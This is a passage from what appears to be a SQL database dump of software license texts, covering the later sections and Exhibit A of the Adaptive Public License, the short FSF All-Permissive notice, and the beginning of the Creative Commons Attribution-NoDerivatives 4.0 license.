not require Recipients to display, at any time, more\nthan the following Attribution Information: (a) a copyright notice including\nthe name of the Initial Contributor; (b) a word or one phrase (not exceeding\n10 words); (c) one digital image or graphic provided with the Initial Work;\nand (d) a URL (collectively, the \"ATTRIBUTION LIMITS\").\n\n(b) If no Supplement File exists, or no Attribution Information is set out\nin Part 2 of the Supplement File, then there are no requirements for Recipients\nto display any Attribution Information of the Initial Contributor.\n\n(c) Each Recipient acknowledges that all trademarks, service marks and/or\ntrade names contained within Part 2 of the Supplement File distributed with\nthe Licensed Work are the exclusive property of the Initial Contributor and\nmay only be used with the permission of the Initial Contributor, or under\ncircumstances otherwise permitted by law, or as expressly set out in this\nLicense.\n\n3.11. For greater certainty, any description or attribution provisions contained\nwithin a Supplement File may only be used to specify the nature of the description\nor attribution requirements, as the case may be. Any provision in a Supplement\nFile that otherwise purports to modify, vary, nullify or amend any right,\nobligation or representation contained herein shall be deemed void to that\nextent, and shall be of no force or effect.\n\n 4. COMMERCIAL USE AND INDEMNITY.\n\n 4.1. COMMERCIAL SERVICES.\n\nA Recipient (\"COMMERCIAL RECIPIENT\") may choose to offer, and to charge a\nfee for, warranty, support, indemnity or liability obligations (collectively,\n\"SERVICES\") to one or more other Recipients or Distributors. However, such\nCommercial Recipient may do so only on that Commercial Recipient\'s own behalf,\nand not on behalf of any other Distributor or Recipient, and Commercial Recipient\nmust make it clear than any such warranty, support, indemnity or liability\nobligation(s) is/are offered by Commercial Recipient alone. At no time may\nCommercial Recipient use any Services to deny any party the Licensed Work\nin Source Code or Executable form when so required under any of the other\nterms of this License. For greater certainty, this Section 4.1 does not diminish\nany of the other terms of this License, including without limitation the obligation\nof the Commercial Recipient as a Distributor, when distributing any of the\nLicensed Work in Source Code or Executable form, to make such distribution\nroyalty-free (subject to the right to charge a fee of no more than the cost\nof physically performing Source Code or Executable distribution (as the case\nmay be)).\n\n 4.2. INDEMNITY.\n\nCommercial distributors of software may accept certain responsibilities with\nrespect to end users, business partners and the like. While this License is\nintended to facilitate the commercial use of the Licensed Work, the Distributor\nwho includes any of the Licensed Work in a commercial product offering should\ndo so in a manner which does not create potential liability for other Distributors.\nTherefore, if a Distributor includes the Licensed Work in a commercial product\noffering or offers any Services, such Distributor (\"COMMERCIAL DISTRIBUTOR\")\nhereby agrees to defend and indemnify every other Distributor or Subsequent\nContributor (in each case an \"INDEMNIFIED PARTY\") against any losses, damages\nand costs (collectively \"LOSSES\") arising from claims, lawsuits and other\nlegal actions brought by a third party against the Indemnified Party to the\nextent caused by the acts or omissions of such Commercial Distributor in connection\nwith its distribution of any of the Licensed Work in a commercial product\noffering or in connection with any Services. The obligations in this section\ndo not apply to any claims or Losses relating to any actual or alleged intellectual\nproperty infringement. In order to qualify, an Indemnified Party must: (a)\npromptly notify the Commercial Distributor in writing of such claim; and (b)\nallow the Commercial Distributor to control, and co-operate with the Commercial\nDistributor in, the defense and any related settlement negotiations. The Indemnified\nParty may participate in any such claim at its own expense.\n\n 5. VERSIONS OF THE LICENSE.\n\n 5.1. NEW VERSIONS.\n\nThe Initial Contributor may publish revised and/or new versions of the License\nfrom time to time. Each version will be given a distinguishing version number.\n\n 5.2. EFFECT OF NEW VERSIONS.\n\nOnce the Licensed Work or any portion thereof has been published by Initial\nContributor under a particular version of the License, Recipient may choose\nto continue to use it under the terms of that version. However, if a Recipient\nchooses to use the Licensed Work under the terms of any subsequent version\nof the License published by the Initial Contributor, then from the date of\nmaking this choice, the Recipient must comply with the terms of that subsequent\nversion with respect to all further reproduction, preparation of derivative\nworks, public display of, public performance of, distribution and sublicensing\nby the Recipient in connection with the Licensed Work. No one other than the\nInitial Contributor has the right to modify the terms applicable to the Licensed\nWork\n\n 6. DISCLAIMER OF WARRANTY.\n\n 6.1. GENERAL DISCLAIMER.\n\nEXCEPT AS EXPRESSLY SET FORTH IN THIS LICENSE, THE LICENSED WORK IS PROVIDED\nUNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT ANY REPRESENTATION, WARRANTY,\nGUARANTEE, ASSURANCE OR CONDITION OF ANY KIND, EITHER EXPRESSED OR IMPLIED,\nINCLUDING, WITHOUT LIMITATION, WARRANTIES OR CONDITIONS OF TITLE, NON-INFRINGEMENT,\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO\nTHE QUALITY AND PERFORMANCE OF THE LICENSED WORK IS WITH RECIPIENT. SHOULD\nANY LICENSED WORK PROVE DEFECTIVE IN ANY RESPECT, RECIPIENT (NOT THE INITIAL\nCONTRIBUTOR OR ANY SUBSEQUENT CONTRIBUTOR) ASSUMES THE COST OF ANY NECESSARY\nSERVICING, REPAIR OR CORRECTION. THIS CLAUSE CONSTITUTES AN ESSENTIAL PART\nOF THIS LICENSE. NO USE OF ANY LICENSED WORK IS AUTHORIZED HEREUNDER EXCEPT\nUNDER THIS LICENSE INCLUDING WITHOUT LIMITATION THIS DISCLAIMER.\n\n 6.2. RESPONSIBILITY OF RECIPIENTS.\n\nEach Recipient is solely responsible for determining the appropriateness of\nusing and distributing the Licensed Work and assumes all risks associated\nwith its exercise of rights under this License, including but not limited\nto the risks and costs of program errors, compliance with applicable laws,\ndamage to or loss of data, programs or equipment, and unavailability or interruption\nof operations.\n\n 7. TERMINATION.\n\n7.1. This License shall continue until terminated in accordance with the express\nterms herein.\n\n7.2. Recipient may choose to terminate this License automatically at any time.\n\n7.3. This License, including without limitation the rights granted hereunder\nto a particular Recipient, will terminate automatically if such Recipient\nis in material breach of any of the terms of this License and fails to cure\nsuch breach within sixty (60) days of becoming aware of the breach. Without\nlimiting the foregoing, any material breach by such Recipient of any term\nof any other License under which such Recipient is granted any rights to the\nLicensed Work shall constitute a material breach of this License.\n\n7.4. Upon termination of this License by or with respect to a particular Recipient\nfor any reason, all rights granted hereunder and under any other License to\nthat Recipient shall terminate. However, all sublicenses to the Licensed Work\nwhich were previously properly granted by such Recipient under a copy of this\nLicense (in each case, an \"Other License\" and in plural, \"Other Licenses\")\nshall survive any such termination of this License, including without limitation\nthe rights and obligations under such Other Licenses as set out in their respective\nSections 2, 3, 4, 5, 6, 7 and 8, mutatis mutandis, for so long as the respective\nsublicensees (i.e. other Recipients) remain in compliance with the terms of\nthe copy of this License under which such sublicensees received rights to\nthe Licensed Work. Any termination of such Other Licenses shall be pursuant\nto their respective Section 7, mutatis mutandis. Provisions which, by their\nnature, must remain in effect beyond the termination of this License shall\nsurvive.\n\n7.5. Upon any termination of this License by or with respect to a particular\nRecipient, Sections 4.1, 4.2, 6.1, 6.2, 7.4, 7.5, 8.1, and 8.2, together with\nall provisions of this License necessary for the interpretation and enforcement\nof same, shall expressly survive such termination.\n\n 8. LIMITATION OF LIABILITY.\n\n8.1. IN NO EVENT SHALL ANY OF INITIAL CONTRIBUTOR, ITS SUBSIDIARIES, OR AFFILIATES,\nOR ANY OF ITS OR THEIR RESPECTIVE OFFICERS, DIRECTORS, EMPLOYEES, AND/OR AGENTS\n(AS THE CASE MAY BE), HAVE ANY LIABILITY FOR ANY DIRECT DAMAGES, INDIRECT\nDAMAGES, PUNITIVE DAMAGES, INCIDENTAL DAMAGES, SPECIAL DAMAGES, EXEMPLARY\nDAMAGES, CONSEQUENTIAL DAMAGES OR ANY OTHER DAMAGES WHATSOEVER (INCLUDING\nWITHOUT LIMITATION LOSS OF USE, DATA OR PROFITS, OR ANY OTHER LOSS ARISING\nOUT OF OR IN ANY WAY RELATED TO THE USE, INABILITY TO USE, UNAUTHORIZED USE,\nPERFORMANCE, OR NON-PERFORMANCE OF THE LICENSED WORK OR ANY PART THEREOF OR\nTHE PROVISION OF OR FAILURE TO PROVIDE SUPPORT SERVICES, OR THAT RESULT FROM\nERRORS, DEFECTS, OMISSIONS, DELAYS IN OPERATION OR TRANSMISSION, OR ANY OTHER\nFAILURE OF PERFORMANCE), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nIN RELATION TO OR ARISING IN ANY WAY OUT OF THIS LICENSE OR THE USE OR DISTRIBUTION\nOF THE LICENSED WORK OR THE EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN\nIF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nTHIS CLAUSE CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY LICENSED\nWORK IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS LICENSE INCLUDING WITHOUT LIMITATION\nTHE LIMITATIONS SET FORTH IN THIS SECTION 8.1.\n\n8.2. EXCEPT AS EXPRESSLY SET FORTH IN THIS LICENSE, EACH RECIPIENT SHALL NOT\nHAVE ANY LIABILITY FOR ANY EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING\nWITHOUT LIMITATION LOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\nWHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE LICENSED WORK OR\nTHE EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY\nFOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH PARTY\'S NEGLIGENCE TO THE\nEXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\n\n 9. GOVERNING LAW AND LEGAL ACTION.\n\n9.1. This License shall be governed by and construed in accordance with the\nlaws of the Governing Jurisdiction assigned in Part 3 of Exhibit A, without\nregard to its conflict of law provisions. No party may bring a legal action\nunder this License more than one year after the cause of the action arose.\nEach party waives its rights (if any) to a jury trial in any litigation arising\nunder this License. Note that if the Governing Jurisdiction is not assigned\nin Part 3 of Exhibit A, then the Governing Jurisdiction shall be the State\nof New York.\n\n9.2. The courts of the Governing Jurisdiction shall have jurisdiction, but\nnot exclusive jurisdiction, to entertain and determine all disputes and claims,\nwhether for specific performance, injunction, damages or otherwise, both at\nlaw and in equity, arising out of or in any way relating to this License,\nincluding without limitation, the legality, validity, existence and enforceability\nof this License. Each party to this License hereby irrevocably attorns to\nand accepts the jurisdiction of the courts of the Governing Jurisdiction for\nsuch purposes.\n\n9.3. Except as expressly set forth elsewhere herein, in the event of any action\nor proceeding brought by any party against another under this License the\nprevailing party shall be entitled to recover all costs and expenses including\nthe fees of its attorneys in such action or proceeding in such amount as the\ncourt may adjudge reasonable.\n\n 10. MISCELLANEOUS.\n\n10.1. The obligations imposed by this License are for the benefit of the Initial\nContributor and any Recipient, and each Recipient acknowledges and agrees\nthat the Initial Contributor and/or any other Recipient may enforce the terms\nand conditions of this License against any Recipient.\n\n10.2. This License represents the complete agreement concerning subject matter\nhereof, and supersedes and cancels all previous oral and written communications,\nrepresentations, agreements and understandings between the parties with respect\nto the subject matter hereof.\n\n10.3. The application of the United Nations Convention on Contracts for the\nInternational Sale of Goods is expressly excluded.\n\n10.4. The language in all parts of this License shall be in all cases construed\nsimply according to its fair meaning, and not strictly for or against any\nof the parties hereto. Any law or regulation which provides that the language\nof a contract shall be construed against the drafter shall not apply to this\nLicense.\n\n10.5. If any provision of this License is invalid or unenforceable under the\nlaws of the Governing Jurisdiction, it shall not affect the validity or enforceability\nof the remainder of the terms of this License, and without further action\nby the parties hereto, such provision shall be reformed to the minimum extent\nnecessary to make such provision valid and enforceable.\n\n10.6. The paragraph headings of this License are for reference and convenience\nonly and are not a part of this License, and they shall have no effect upon\nthe construction or interpretation of any part hereof.\n\n10.7. Each of the terms \"including\", \"include\" and \"includes\", when used in\nthis License, is not limiting whether or not non-limiting language (such as\n\"without limitation\" or \"but not limited to\" or words of similar import) is\nused with reference thereto.\n\n10.8. The parties hereto acknowledge they have expressly required that this\nLicense and notices relating thereto be drafted in the English language. //***THE\nLICENSE TERMS END HERE (OTHER THAN AS SET OUT IN EXHIBIT A).***//\n\nEXHIBIT A (to the Adaptive Public License)\n\n PART 1: INITIAL CONTRIBUTOR AND DESIGNATED WEB SITE\n\n The Initial Contributor is:\n\n ________________________________________________\n\n [Enter full name of Initial Contributor]\n\n \n\n Address of Initial Contributor:\n\n ________________________________________________\n\n ________________________________________________\n\n ________________________________________________\n\n [Enter address above]\n\n \n\n The Designated Web Site is:\n\n ________________________________________________\n\n [Enter URL for Designated Web Site of Initial Contributor]\n\n \n\nNOTE: The Initial Contributor is to complete this Part 1, along with Parts\n2, 3, and 5, and, if applicable, Parts 4 and 6.\n\n PART 2: INITIAL WORK\n\nThe Initial Work comprises the computer program(s) distributed by the Initial\nContributor having the following title(s): _______________________________________________.\n\nThe date on which the Initial Work was first available under this License:\n_________________\n\n PART 3: GOVERNING JURISDICTION\n\nFor the purposes of this License, the Governing Jurisdiction is _________________________________________________.\n[Initial Contributor to Enter Governing Jurisdiction here]\n\n PART 4: THIRD PARTIES\n\nFor the purposes of this License, \"Third Party\" has the definition set forth\nbelow in the ONE paragraph selected by the Initial Contributor from paragraphs\nA, B, C, D and E when the Initial Work is distributed or otherwise made available\nby the Initial Contributor. To select one of the following paragraphs, the\nInitial Contributor must place an \"X\" or \"x\" in the selection box alongside\nthe one respective paragraph selected.\n\n SELECTION\n\n BOX PARAGRAPH\n\n \n\n [ ] A. \"THIRD PARTY\" means any third party.\n\n \n\n[ ] B. \"THIRD PARTY\" means any third party except for any of the following:\n(a) a wholly owned subsidiary of the Subsequent Contributor in question; (b)\na legal entity (the \"PARENT\") that wholly owns the Subsequent Contributor\nin question; or (c) a wholly owned subsidiary of the wholly owned subsidiary\nin (a) or of the Parent in (b).\n\n \n\n[ ] C. \"THIRD PARTY\" means any third party except for any of the following:\n(a) any Person directly or indirectly owning a majority of the voting interest\nin the Subsequent Contributor or (b) any Person in which the Subsequent Contributor\ndirectly or indirectly owns a majority voting interest.\n\n \n\n[ ] D. \"THIRD PARTY\" means any third party except for any Person directly\nor indirectly controlled by the Subsequent Contributor. For purposes of this\ndefinition, \"control\" shall mean the power to direct or cause the direction\nof, the management and policies of such Person whether through the ownership\nof voting interests, by contract, or otherwise.\n\n \n\n[ ] E. \"THIRD PARTY\" means any third party except for any Person directly\nor indirectly controlling, controlled by, or under common control with the\nSubsequent Contributor. For purposes of this definition, \"control\" shall mean\nthe power to direct or cause the direction of, the management and policies\nof such Person whether through the ownership of voting interests, by contract,\nor otherwise.\n\nThe default definition of \"THIRD PARTY\" is the definition set forth in paragraph\nA, if NONE OR MORE THAN ONE of paragraphs A, B, C, D or E in this Part 4 are\nselected by the Initial Contributor.\n\n PART 5: NOTICE\n\nTHE LICENSED WORK IS PROVIDED UNDER THE TERMS OF THE ADAPTIVE PUBLIC LICENSE\n(\"LICENSE\") AS FIRST COMPLETED BY: ______________________ [Insert the name\nof the Initial Contributor here]. ANY USE, PUBLIC DISPLAY, PUBLIC PERFORMANCE,\nREPRODUCTION OR DISTRIBUTION OF, OR PREPARATION OF DERIVATIVE WORKS BASED\nON, THE LICENSED WORK CONSTITUTES RECIPIENT\'S ACCEPTANCE OF THIS LICENSE AND\nITS TERMS, WHETHER OR NOT SUCH RECIPIENT READS THE TERMS OF THE LICENSE. \"LICENSED\nWORK\" AND \"RECIPIENT\" ARE DEFINED IN THE LICENSE. A COPY OF THE LICENSE IS\nLOCATED IN THE TEXT FILE ENTITLED \"LICENSE.TXT\" ACCOMPANYING THE CONTENTS\nOF THIS FILE. IF A COPY OF THE LICENSE DOES NOT ACCOMPANY THIS FILE, A COPY\nOF THE LICENSE MAY ALSO BE OBTAINED AT THE FOLLOWING WEB SITE: ___________________________________________________[Insert\nInitial Contributor\'s Designated Web Site here]\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\n PART 6: PATENT LICENSING TERMS\n\nFor the purposes of this License, paragraphs A, B, C, D and E of this Part\n6 of Exhibit A are only incorporated and form part of the terms of the License\nif the Initial Contributor places an \"X\" or \"x\" in the selection box alongside\nthe YES answer to the question immediately below.\n\n Is this a Patents-Included License pursuant to Section 2.2 of the License?\n\n \n\n YES [ ]\n\n \n\n NO [ ]\n\nBy default, if YES is not selected by the Initial Contributor, the answer\nis NO.\n\nA. For the purposes of the paragraphs in this Part 6 of Exhibit A, \"LICENSABLE\"\nmeans having the right to grant, to the maximum extent possible, whether at\nthe time of the initial grant or subsequently acquired, any and all of the\nrights granted herein.\n\nB. The Initial Contributor hereby grants all Recipients a world-wide, royalty-free,\nnon-exclusive license, subject to third party intellectual property claims,\nunder patent claim(s) Licensable by the Initial Contributor that are or would\nbe infringed by the making, using, selling, offering for sale, having made,\nimporting, exporting, transfer or disposal of such Initial Work or any portion\nthereof. Notwithstanding the foregoing, no patent license is granted under\nthis Paragraph B by the Initial Contributor: (1) for any code that the Initial\nContributor deletes from the Initial Work (or any portion thereof) distributed\nby the Initial Contributor prior to such distribution; (2) for any Modifications\nmade to the Initial Work (or any portion thereof) by any other Person; or\n(3) separate from the Initial Work (or portions thereof) distributed or made\navailable by the Initial Contributor.\n\nC. Effective upon distribution by a Subsequent Contributor to a Third Party\nof any Modifications made by that Subsequent Contributor, such Subsequent\nContributor hereby grants all Recipients a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims, under patent\nclaim(s) Licensable by such Subsequent Contributor that are or would be infringed\nby the making, using, selling, offering for sale, having made, importing,\nexporting, transfer or disposal of any such Modifications made by that Subsequent\nContributor alone and/or in combination with its Subsequent Work (or portions\nof such combination) to make, use, sell, offer for sale, have made, import,\nexport, transfer and otherwise dispose of:\n\n(1) Modifications made by that Subsequent Contributor (or portions thereof);\nand\n\n(2) the combination of Modifications made by that Subsequent Contributor with\nits Subsequent Work (or portions of such combination);\n\n (collectively and in each case, the \"SUBSEQUENT CONTRIBUTOR VERSION\").\n\nNotwithstanding the foregoing, no patent license is granted under this Paragraph\nC by such Subsequent Contributor: (1) for any code that such Subsequent Contributor\ndeletes from the Subsequent Contributor Version (or any portion thereof) distributed\nby the Subsequent Contributor prior to such distribution; (2) for any Modifications\nmade to the Subsequent Contributor Version (or any portion thereof) by any\nother Person; or (3) separate from the Subsequent Contributor Version (or\nportions thereof) distributed or made available by the Subsequent Contributor.\n\nD. Effective upon distribution of any Licensed Work by a Distributor to a\nThird Party, such Distributor hereby grants all Recipients a world-wide, royalty-free,\nnon-exclusive license, subject to third party intellectual property claims,\nunder patent claim(s) Licensable by such Distributor that are or would be\ninfringed by the making, using, selling, offering for sale, having made, importing,\nexporting, transfer or disposal of any such Licensed Work distributed by such\nDistributor, to make, use, sell, offer for sale, have made, import, export,\ntransfer and otherwise dispose of such Licensed Work or portions thereof (collectively\nand in each case, the \"DISTRIBUTOR VERSION\"). Notwithstanding the foregoing,\nno patent license is granted under this Paragraph D by such Distributor: (1)\nfor any code that such Distributor deletes from the Distributor Version (or\nany portion thereof) distributed by the Distributor prior to such distribution;\n(2) for any Modifications made to the Distributor Version (or any portion\nthereof) by any other Person; or (3) separate from the Distributor Version\n(or portions thereof) distributed or made available by the Distributor.\n\nE. If Recipient institutes patent litigation against another Recipient (a\n\"USER\") with respect to a patent applicable to a computer program or software\n(including a cross-claim or counterclaim in a lawsuit, and whether or not\nany of the patent claims are directed to a system, method, process, apparatus,\ndevice, product, article of manufacture or any other form of patent claim),\nthen any patent or copyright license granted by that User to such Recipient\nunder this License or any other copy of this License shall terminate. The\ntermination shall be effective ninety (90) days after notice of termination\nfrom User to Recipient, unless the Recipient withdraws the patent litigation\nclaim before the end of the ninety (90) day period. To be effective, any such\nnotice of license termination must include a specific list of applicable patents\nand/or a copy of the copyrighted work of User that User alleges will be infringed\nby Recipient upon License termination. License termination is only effective\nwith respect to patents and/or copyrights for which proper notice has been\ngiven.\n\n PART 7: SAMPLE REQUIREMENTS FOR THE DESCRIPTION OF DISTRIBUTED MODIFICATIONS\n\nEach Subsequent Contributor (including the Initial Contributor where the Initial\nContributor qualifies as a Subsequent Contributor) is invited (but not required)\nto cause each Subsequent Work created or contributed to by that Subsequent\nContributor to contain a file documenting the changes such Subsequent Contributor\nmade to create that Subsequent Work and the date of any change.\n\n//***EXHIBIT A ENDS HERE.***//\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(7,'FSFAP','Copying and distribution of this file, with or without modification, are permitted\nin any medium without royalty provided the copyright notice and this notice\nare preserved. This file is offered as-is, without any warranty.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(8,'CC-BY-ND-4.0','Creative Commons Attribution-NoDerivatives 4.0 International Creative Commons\nCorporation (\"Creative Commons\") is not a law firm and does not provide legal\nservices or legal advice. Distribution of Creative Commons public licenses\ndoes not create a lawyer-client or other relationship. Creative Commons makes\nits licenses and related information available on an \"as-is\" basis. Creative\nCommons gives no warranties regarding its licenses, any material licensed\nunder their terms and conditions, or any related information. Creative Commons\ndisclaims all liability for damages resulting from their use to the fullest\nextent possible.\n\nUsing Creative Commons Public Licenses\n\nCreative Commons public licenses provide a standard set of terms and conditions\nthat creators and other rights holders may use to share original works of\nauthorship and other material subject to copyright and certain other rights\nspecified in the public license below. The following considerations are for\ninformational purposes only, are not exhaustive, and do not form part of our\nlicenses.\n\nConsiderations for licensors: Our public licenses are intended for use by\nthose authorized to give the public permission to use material in ways otherwise\nrestricted by copyright and certain other rights. Our licenses are irrevocable.\nLicensors should read and understand the terms and conditions of the license\nthey choose before applying it. Licensors should also secure all rights necessary\nbefore applying our licenses so that the public can reuse the material as\nexpected. Licensors should clearly mark any material not subject to the license.\nThis includes other CC-licensed material, or material used under an exception\nor limitation to copyright. More considerations for licensors : wiki.creativecommons.org/Considerations_for_licensors\n\nConsiderations for the public: By using one of our public licenses, a licensor\ngrants the public permission to use the licensed material under specified\nterms and conditions. If the licensor\'s permission is not necessary for any\nreason–for example, because of any applicable exception or limitation to copyright–then\nthat use is not regulated by the license. Our licenses grant only permissions\nunder copyright and certain other rights that a licensor has authority to\ngrant. Use of the licensed material may still be restricted for other reasons,\nincluding because others have copyright or other rights in the material. A\nlicensor may make special requests, such as asking that all changes be marked\nor described. Although not required by our licenses, you are encouraged to\nrespect those requests where reasonable. More considerations for the public\n: wiki.creativecommons.org/Considerations_for_licensees\n\nCreative Commons Attribution-NoDerivatives 4.0 International Public License\n\nBy exercising the Licensed Rights (defined below), You accept and agree to\nbe bound by the terms and conditions of this Creative Commons Attribution-NoDerivatives\n4.0 International Public License (\"Public License\"). To the extent this Public\nLicense may be interpreted as a contract, You are granted the Licensed Rights\nin consideration of Your acceptance of these terms and conditions, and the\nLicensor grants You such rights in consideration of benefits the Licensor\nreceives from making the Licensed Material available under these terms and\nconditions.\n\nSection 1 – Definitions.\n\na. Adapted Material means material subject to Copyright and Similar Rights\nthat is derived from or based upon the Licensed Material and in which the\nLicensed Material is translated, altered, arranged, transformed, or otherwise\nmodified in a manner requiring permission under the Copyright and Similar\nRights held by the Licensor. For purposes of this Public License, where the\nLicensed Material is a musical work, performance, or sound recording, Adapted\nMaterial is always produced where the Licensed Material is synched in timed\nrelation with a moving image.\n\nb. Copyright and Similar Rights means copyright and/or similar rights closely\nrelated to copyright including, without limitation, performance, broadcast,\nsound recording, and Sui Generis Database Rights, without regard to how the\nrights are labeled or categorized. For purposes of this Public License, the\nrights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights.\n\nc. Effective Technological Measures means those measures that, in the absence\nof proper authority, may not be circumvented under laws fulfilling obligations\nunder Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996,\nand/or similar international agreements.\n\nd. Exceptions and Limitations means fair use, fair dealing, and/or any other\nexception or limitation to Copyright and Similar Rights that applies to Your\nuse of the Licensed Material.\n\ne. Licensed Material means the artistic or literary work, database, or other\nmaterial to which the Licensor applied this Public License.\n\nf. Licensed Rights means the rights granted to You subject to the terms and\nconditions of this Public License, which are limited to all Copyright and\nSimilar Rights that apply to Your use of the Licensed Material and that the\nLicensor has authority to license.\n\ng. Licensor means the individual(s) or entity(ies) granting rights under this\nPublic License.\n\nh. Share means to provide material to the public by any means or process that\nrequires permission under the Licensed Rights, such as reproduction, public\ndisplay, public performance, distribution, dissemination, communication, or\nimportation, and to make material available to the public including in ways\nthat members of the public may access the material from a place and at a time\nindividually chosen by them.\n\ni. Sui Generis Database Rights means rights other than copyright resulting\nfrom Directive 96/9/EC of the European Parliament and of the Council of 11\nMarch 1996 on the legal protection of databases, as amended and/or succeeded,\nas well as other essentially equivalent rights anywhere in the world.\n\nj. You means the individual or entity exercising the Licensed Rights under\nthis Public License. Your has a corresponding meaning.\n\nSection 2 – Scope.\n\n a. License grant.\n\n1. Subject to the terms and conditions of this Public License, the Licensor\nhereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive,\nirrevocable license to exercise the Licensed Rights in the Licensed Material\nto:\n\n A. reproduce and Share the Licensed Material, in whole or in part; and\n\n B. produce and reproduce, but not Share, Adapted Material.\n\n2. Exceptions and Limitations. For the avoidance of doubt, where Exceptions\nand Limitations apply to Your use, this Public License does not apply, and\nYou do not need to comply with its terms and conditions.\n\n 3. Term. The term of this Public License is specified in Section 6(a).\n\n4. Media and formats; technical modifications allowed. The Licensor authorizes\nYou to exercise the Licensed Rights in all media and formats whether now known\nor hereafter created, and to make technical modifications necessary to do\nso. The Licensor waives and/or agrees not to assert any right or authority\nto forbid You from making technical modifications necessary to exercise the\nLicensed Rights, including technical modifications necessary to circumvent\nEffective Technological Measures. For purposes of this Public License, simply\nmaking modifications authorized by this Section 2(a)(4) never produces Adapted\nMaterial.\n\n 5. Downstream recipients.\n\nA. Offer from the Licensor – Licensed Material. Every recipient of the Licensed\nMaterial automatically receives an offer from the Licensor to exercise the\nLicensed Rights under the terms and conditions of this Public License.\n\nB. No downstream restrictions. You may not offer or impose any additional\nor different terms or conditions on, or apply any Effective Technological\nMeasures to, the Licensed Material if doing so restricts exercise of the Licensed\nRights by any recipient of the Licensed Material.\n\n6. No endorsement. Nothing in this Public License constitutes or may be construed\nas permission to assert or imply that You are, or that Your use of the Licensed\nMaterial is, connected with, or sponsored, endorsed, or granted official status\nby, the Licensor or others designated to receive attribution as provided in\nSection 3(a)(1)(A)(i).\n\n b. Other rights.\n\n1. Moral rights, such as the right of integrity, are not licensed under this\nPublic License, nor are publicity, privacy, and/or other similar personality\nrights; however, to the extent possible, the Licensor waives and/or agrees\nnot to assert any such rights held by the Licensor to the limited extent necessary\nto allow You to exercise the Licensed Rights, but not otherwise.\n\n2. Patent and trademark rights are not licensed under this Public License.\n\n3. To the extent possible, the Licensor waives any right to collect royalties\nfrom You for the exercise of the Licensed Rights, whether directly or through\na collecting society under any voluntary or waivable statutory or compulsory\nlicensing scheme. In all other cases the Licensor expressly reserves any right\nto collect such royalties.\n\nSection 3 – License Conditions.\n\nYour exercise of the Licensed Rights is expressly made subject to the following\nconditions.\n\n a. Attribution.\n\n 1. If You Share the Licensed Material, You must:\n\nA. retain the following if it is supplied by the Licensor with the Licensed\nMaterial:\n\ni. identification of the creator(s) of the Licensed Material and any others\ndesignated to receive attribution, in any reasonable manner requested by the\nLicensor (including by pseudonym if designated);\n\n ii. a copyright notice;\n\n iii. a notice that refers to this Public License;\n\n iv. a notice that refers to the disclaimer of warranties;\n\nv. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;\n\nB. indicate if You modified the Licensed Material and retain an indication\nof any previous modifications; and\n\nC. indicate the Licensed Material is licensed under this Public License, and\ninclude the text of, or the URI or hyperlink to, this Public License.\n\n2. For the avoidance of doubt, You do not have permission under this Public\nLicense to Share Adapted Material.\n\n3. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner\nbased on the medium, means, and context in which You Share the Licensed Material.\nFor example, it may be reasonable to satisfy the conditions by providing a\nURI or hyperlink to a resource that includes the required information.\n\n4. If requested by the Licensor, You must remove any of the information required\nby Section 3(a)(1)(A) to the extent reasonably practicable.\n\nSection 4 – Sui Generis Database Rights.\n\nWhere the Licensed Rights include Sui Generis Database Rights that apply to\nYour use of the Licensed Material:\n\na. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract,\nreuse, reproduce, and Share all or a substantial portion of the contents of\nthe database, provided You do not Share Adapted Material;\n\nb. if You include all or a substantial portion of the database contents in\na database in which You have Sui Generis Database Rights, then the database\nin which You have Sui Generis Database Rights (but not its individual contents)\nis Adapted Material; and\n\nc. You must comply with the conditions in Section 3(a) if You Share all or\na substantial portion of the contents of the database.\n\nFor the avoidance of doubt, this Section 4 supplements and does not replace\nYour obligations under this Public License where the Licensed Rights include\nother Copyright and Similar Rights.\n\nSection 5 – Disclaimer of Warranties and Limitation of Liability.\n\na. Unless otherwise separately undertaken by the Licensor, to the extent possible,\nthe Licensor offers the Licensed Material as-is and as-available, and makes\nno representations or warranties of any kind concerning the Licensed Material,\nwhether express, implied, statutory, or other. This includes, without limitation,\nwarranties of title, merchantability, fitness for a particular purpose, non-infringement,\nabsence of latent or other defects, accuracy, or the presence or absence of\nerrors, whether or not known or discoverable. Where disclaimers of warranties\nare not allowed in full or in part, this disclaimer may not apply to You.\n\nb. To the extent possible, in no event will the Licensor be liable to You\non any legal theory (including, without limitation, negligence) or otherwise\nfor any direct, special, indirect, incidental, consequential, punitive, exemplary,\nor other losses, costs, expenses, or damages arising out of this Public License\nor use of the Licensed Material, even if the Licensor has been advised of\nthe possibility of such losses, costs, 